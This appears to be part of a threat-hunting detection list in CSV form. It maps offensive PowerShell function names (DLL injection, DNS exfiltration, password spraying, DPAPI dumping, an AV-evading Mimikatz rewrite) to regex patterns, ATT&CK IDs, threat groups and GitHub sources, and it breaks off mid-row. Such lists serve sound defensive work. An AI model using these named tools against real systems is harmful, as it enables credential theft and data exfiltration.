"*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48956" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48957" 
"*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48958" "*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that 
can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48959" "*Invoke-DllInjection.ps1*",".{0,1000}Invoke\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48960" "*Invoke-DNSExfiltrator*",".{0,1000}Invoke\-DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","48961" "*Invoke-DNSteal*",".{0,1000}Invoke\-DNSteal.{0,1000}","offensive_tool_keyword","Invoke-DNSteal","DNS Data Exfiltrator","T1071.004 - T1041 - T1048","TA0011 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/JoelGMSec/Invoke-DNSteal","1","1","N/A","N/A","10","2","109","23","2023-07-17T11:26:19Z","2021-06-24T11:03:09Z","48962" "*invoke-dnsupdate *",".{0,1000}invoke\-dnsupdate\s.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","48963" "*Invoke-DNSUpdate.ps1*",".{0,1000}Invoke\-DNSUpdate\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor 
- Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","48964" "*Invoke-Dogz.ps1*",".{0,1000}Invoke\-Dogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","48965" "*Invoke-DomainHarvest*",".{0,1000}Invoke\-DomainHarvest.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","48966" "*Invoke-DomainHarvestOWA*",".{0,1000}Invoke\-DomainHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","48967" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","48968" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","48969" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - 
T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48970" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48971" "*Invoke-DOSfuscation*",".{0,1000}Invoke\-DOSfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. 
(White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","N/A","9","880","139","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z","48972" "*Invoke-DowngradeAccount*",".{0,1000}Invoke\-DowngradeAccount.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48973" "*Invoke-DownloadFile *",".{0,1000}Invoke\-DownloadFile\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 
T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48974" "*Invoke-DownloadFile.ps1*",".{0,1000}Invoke\-DownloadFile\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48975" "*Invoke-DpapiDump*",".{0,1000}Invoke\-DpapiDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48976" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Has the ability to download single files from SharePoint and OneDrive as the current user","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48977" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48978" "*Invoke-DriverCoInstallersCheck*",".{0,1000}Invoke\-DriverCoInstallersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48979" "*Invoke-DropboxUpload*",".{0,1000}Invoke\-DropboxUpload.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48980" 
"*Invoke-DumpApps*",".{0,1000}Invoke\-DumpApps.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets app registrations and external enterprise apps along with consent and scope info","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48981" "*Invoke-DumpCAPS*",".{0,1000}Invoke\-DumpCAPS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Gets conditional access policies","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48982" "*Invoke-DumpMDEConfig*",".{0,1000}Invoke\-DumpMDEConfig.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","1","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","48983" "*Invoke-DumpOWAMailboxViaMSGraphApi*",".{0,1000}Invoke\-DumpOWAMailboxViaMSGraphApi.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","48984" "*invoke-edrchecker*",".{0,1000}invoke\-edrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a 
proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48985" "*Invoke-EDRChecker*",".{0,1000}Invoke\-EDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","48986" "*Invoke-EDRChecker.ps1*",".{0,1000}Invoke\-EDRChecker\.ps1.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","48987" "*Invoke-EgressCheck*",".{0,1000}Invoke\-EgressCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EgressCheck.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48988" "*Invoke-EgressCheck.ps1*",".{0,1000}Invoke\-EgressCheck\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48989" "*Invoke-Empire -Servers*",".{0,1000}Invoke\-Empire\s\-Servers.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 